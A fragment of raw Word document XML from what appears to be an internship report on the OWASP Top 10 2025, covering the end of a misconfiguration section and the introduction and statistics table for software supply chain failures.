                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Danger</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6EF99776" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00B0643B">
            <w:pPr>
              <w:spacing w:after="240"/>
              <w:jc w:val="both"/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Regulatory negligence fines (e.g., under GDPR or HIPAA) and a</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
              <w:t>severe loss of customer trust following a major data breach traced</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
              <w:t>back to a simple, preventable human configuration error.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0EFB7065" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Note for your report:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> This summary block effectively wraps up the entire A05 section by shifting the conversation from deep technical mechanics straight to executive-level operational risk. Good luck with your internship report!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F13905B" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C95DFB5" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="00B74432" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CB3E4C3" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Chapter 4:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C5C0E04" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>A03:2025 Software Supply Chain Failures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02928EFE" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>Introduction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B844A17"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 xml:space="preserve">Modern software is rarely written completely from scratch; instead, it is assembled using a complex web of third-party libraries, open-source packages, and automated CI/CD deployment pipelines. While this accelerates development, </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Software Supply Chain Failures</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> represent a critical breakdown or compromise in the creation, distribution, or updating of these dependencies. The threat landscape has expanded far beyond simply using a library with a known bug; it now includes malicious threat actors actively poisoning open-source ecosystems, compromising trusted vendors, and targeting developer workstations directly with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>selfpropagating</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> malware. Because third-party components run with the exact same system privileges as the core application, a single compromised transit element or unmaintained nested library can grant attackers complete control over an entire corporate infrastructure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D1B2774" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>Statistical Overview &amp; Impact Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05C5687B"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 xml:space="preserve">The alarming nature of this threat is underscored by its status in the security community— ranking as the absolute </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>#1 concern</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> for exactly 50% of respondents in the community survey. Despite being notoriously difficult to track via traditional CVE metrics due to the underlying complexity of nested mapping, it commands the highest average incidence rate of any category when audited in live environments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0145FA46"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The quantitative realities of this risk category are outlined below:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="PlainTable1"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2196"/>
        <w:gridCol w:w="7062"/>
      </w:tblGrid>
      <w:tr w:rsidR="00D66BA1" w:rsidRPr="0083079C" w14:paraId="2C5D3D89" w14:textId="77777777" w:rsidTr="00B064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9EFCC2" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00B0643B">
            <w:pPr>
              <w:spacing w:after="240"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Metric</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="12539A90" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00B0643B">
            <w:pPr>
              <w:spacing w:after="240"/>
              <w:jc w:val="both"/>
              <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Value / Impact</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D66BA1" w:rsidRPr="0083079C" w14:paraId="478AD6AF" w14:textId="77777777" w:rsidTr="00B064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0E8597" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00B0643B">
            <w:pPr>
              <w:spacing w:after="240"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>CWEs Mapped</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1827BD03" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00B0643B">
            <w:pPr>
              <w:spacing w:after="240"/>
              <w:jc w:val="both"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t xml:space="preserve">CWE-477 (Obsolete </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Functon</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>), CWE-1104 (Unmaintained Third-Party),</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
              <w:t>CWE-1329 (Not Updateable Component), CWE-1395 (Vulnerable Third-</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
              <w:t>Party Dependency)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D66BA1" w:rsidRPr="0083079C" w14:paraId="47E154B2" w14:textId="77777777" w:rsidTr="00B0643B">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="345AD310" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00B0643B">
            <w:pPr>
              <w:spacing w:after="240"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Maximum Incidence</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Rate</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1B5FDE56" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00B0643B">
            <w:pPr>
              <w:spacing w:after="240"/>
              <w:jc w:val="both"/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>69.56%</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D66BA1" w:rsidRPr="0083079C" w14:paraId="000F6C15" w14:textId="77777777" w:rsidTr="00B064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7B0722" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00B0643B">
            <w:pPr>
              <w:spacing w:after="240"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Average Incidence</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Rate</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4CCD6E5B" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00B0643B">
            <w:pPr>
              <w:spacing w:after="240"/>
              <w:jc w:val="both"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>5.72%</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>(The highest average density among all evaluated categories)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D66BA1" w:rsidRPr="0083079C" w14:paraId="37AFB547" w14:textId="77777777" w:rsidTr="00B0643B">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6AB21EFE" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00B0643B">
            <w:pPr>
              <w:spacing w:after="240"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Maximum Coverage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4E5BED69" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00B0643B">
            <w:pPr>
              <w:spacing w:after="240"/>
              <w:jc w:val="both"/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>65.42%</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D66BA1" w:rsidRPr="0083079C" w14:paraId="4C0ED7A1" w14:textId="77777777" w:rsidTr="00B064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CA405A" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00B0643B">
            <w:pPr>
              <w:spacing w:after="240"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Average Coverage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6C13BB8C" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00B0643B">
            <w:pPr>
              <w:spacing w:after="240"/>
              <w:jc w:val="both"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>27.47%</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7073195F" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:vanish/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="PlainTable1"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2007"/>
        <w:gridCol w:w="7295"/>
      </w:tblGrid>
      <w:tr w:rsidR="00D66BA1" w:rsidRPr="0083079C" w14:paraId="276B3131" w14:textId="77777777" w:rsidTr="00B064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A14235" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00B0643B">
            <w:pPr>
              <w:spacing w:after="240"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Metric</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6775A5EC" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00B0643B">
            <w:pPr>
              <w:spacing w:after="240"/>
              <w:jc w:val="both"/>
              <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Value / Impact</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D66BA1" w:rsidRPr="0083079C" w14:paraId="2368E5CB" w14:textId="77777777" w:rsidTr="00B064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4AF233" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00B0643B">
            <w:pPr>
              <w:spacing w:after="240"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Average Weighted</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
